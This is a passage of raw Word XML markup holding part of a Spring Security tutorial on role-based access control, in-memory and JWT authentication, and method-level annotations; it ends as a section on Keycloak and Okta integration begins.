    <w:p w14:paraId="67982523" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D5923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6656DF5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configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC399A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EB3FB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orizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F910D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admin/**").hasRole("ADMIN")     // Only users with ADMIN role can access "/admin" endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180830D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user/**").hasRole("USER")       // Only users with USER role can access "/user" endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D46AA6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public/**").permitAll()         // Public endpoints that do not require authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B042CB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yRequest().authenticated()                  // All other requests must be authenticated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A359AD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158202E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formLogin()                                       // Enable form-based login (or other login methods like JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B5EE6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ermitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5987856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3F15FC7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Basic();                                      // Basic authentication (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49841E1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6C83AB5A" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125188B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5CF6B96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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    protected void configure(AuthenticationManagerBuilder auth) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0033BE5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inMemoryAuthentication()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C192D1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ithUser("admin").password(passwordEncoder().encode("password")).roles("ADMIN")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE3113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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E182EA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ithUser("user").password(passwordEncoder().encode("password")).roles("USER");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C2243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72F5301E" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4343E7A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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1BF6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PasswordEncoder passwordEncoder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDC871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new BCryptPasswordEncoder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D38330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00AAF6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24F78857"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03398C">
          <v:rect id="_x0000_i2843" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736327E"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4. Method-Level Security (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053BF12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For more fine-grained access control, you can enable </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method-level security</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This allows you to restrict access to specific methods in your service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679F35CA"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Enable Method Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DF714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540A9E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GlobalMethodSecurity(prePostEnabled = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367E7DB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MethodSecurityConfig extends GlobalMethodSecurityConfiguration {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA912F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4A489C5D"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Using @PreAuthorize and @Secured Annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA37C7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can annotate your service methods with </w:t>
      </w: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or </w:t>
      </w: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to restrict access based on roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9E10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Expression-based access control):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676AAB8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reAuthorize("hasRole('ROLE_ADMIN')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02440A2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void deleteUser(Long userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074744E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 Only accessible by users with ROLE_ADMIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B229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15DBE9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Simple role-based access control):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A9C7D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Secured("ROLE_USER")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6388E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void viewUserProfile(Long userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1187AF9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 Only accessible by users with ROLE_USER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D679A4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2A977E80"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C39EE7">
          <v:rect id="_x0000_i2844" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DCB803"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5. Secure API Endpoints Based on Roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8C17D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You can apply role-based access control to individual API endpoints by using Spring Security annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7A86C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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A90DEF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RequestMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C5F0A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ApiController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD6779" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6740A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admin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D28539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eAuthorize("hasRole('ROLE_ADMIN')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1C54C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adminEndpoint() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CED065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Admin access only!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C18623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0E7BA295" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3818EB1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user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F00D88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eAuthorize("hasRole('ROLE_USER')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80A6B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userEndpoint() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3887856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User access only!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4214B31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2F27D69F" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2661540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GetMapping("/public")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE04D5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ublic String publicEndpoint() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E046F3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return "Public access!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2BF5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084DC0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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F90AB2"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6. Customizing User Authentication (JWT Authentication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C43E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You can also implement </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JWT-based authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of using form-based login. Here’s how you can implement it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B66BF4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Add JWT dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC4DB0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6E12E23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groupId&gt;io.jsonwebtoken&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D805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artifactId&gt;jjwt&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB18F8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lt;version&gt;0.11.5&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DB120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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7750031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Create a JWT Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implement a custom filter to validate JWT tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5393740D"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD809B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JwtTokenFilter extends OncePerRequestFilter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFA6A88" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD5B93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owired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2EB28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ivate JwtTokenProvider jwtTokenProvider;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3984503E" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24073AE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446ABA3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4D764F61"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throws ServletException, IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED02B0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String token = jwtTokenProvider.resolveToken(request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2310AABA"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if (token != null &amp;&amp; jwtTokenProvider.validateToken(token)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517277F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entication auth = jwtTokenProvider.getAuthentication(token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7102C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SecurityContextHolder.getContext().setAuthentication(auth);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D83F059"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69A8435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filterChain.doFilter(request, response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772B9B7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5EF74B8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5018DE65"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Configure JWT Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Register the filter in your security configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6518A18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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFAAEC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EnableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380F311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public class SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DA959F" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11AAC7E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owired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC4E720"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ivate JwtTokenFilter jwtTokenFilter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE3A585" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B51B28F"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083C1096"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protected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03550F0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http.addFilterBefore(jwtTokenFilter, UsernamePasswordAuthenticationFilter.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712F474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uthorizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE5BAB"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admin/**").hasRole("ADMIN")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309F76AE"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tMatchers("/user/**").hasRole("USER")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7098B69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anyRequest().authenticated();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA1C6B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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3250A702"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23B35E" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="00000000" w:rsidP="007A742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B3E519">
          <v:rect id="_x0000_i2845" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A50D78" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Summary of Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0272C8"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Role-based access control (RBAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically implemented using Spring Security’s @PreAuthorize, @Secured, and method security annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFA59B7"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URL-based access control</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is defined in HttpSecurity using .antMatchers().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1550B373"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For custom authentication methods (e.g., JWT), a custom filter is used to authenticate requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540100E4"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In-memory authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be set up for quick testing, but for production, it’s recommended to integrate with a proper authentication provider (e.g., LDAP, OAuth2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458C1AEC" w14:textId="77777777" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="007A7421">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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@PreAuthorize</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for method-level security or </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Secured</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for role-based restrictions at the method level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA1D4EA" w14:textId="1C37E12D" w:rsidR="00187C12" w:rsidRPr="001A12CD" w:rsidRDefault="007A7421" w:rsidP="00187C12">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With this setup, you can effectively manage </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>role-based access control</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71DD51"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51226CC">
          <v:rect id="_x0000_i2846" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34442AC4" w14:textId="03AE18AA"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4" w:name="_Toc197867908"/>
      <w:r w:rsidRPr="00414D65">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to integrate Spring Security with an external identity provider like keycloak or okta using OpenId connect, OIDC or OAuth2</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="694"/>
    </w:p>
    <w:p w14:paraId="72DEE919" w14:textId="1B62B925" w:rsidR="00FF0B50" w:rsidRPr="00FF0B50" w:rsidRDefault="00FF0B50" w:rsidP="00B46817">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To integrate </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an external </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>identity provider</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Okta</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OpenID Connect (OIDC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OAuth2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0B50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
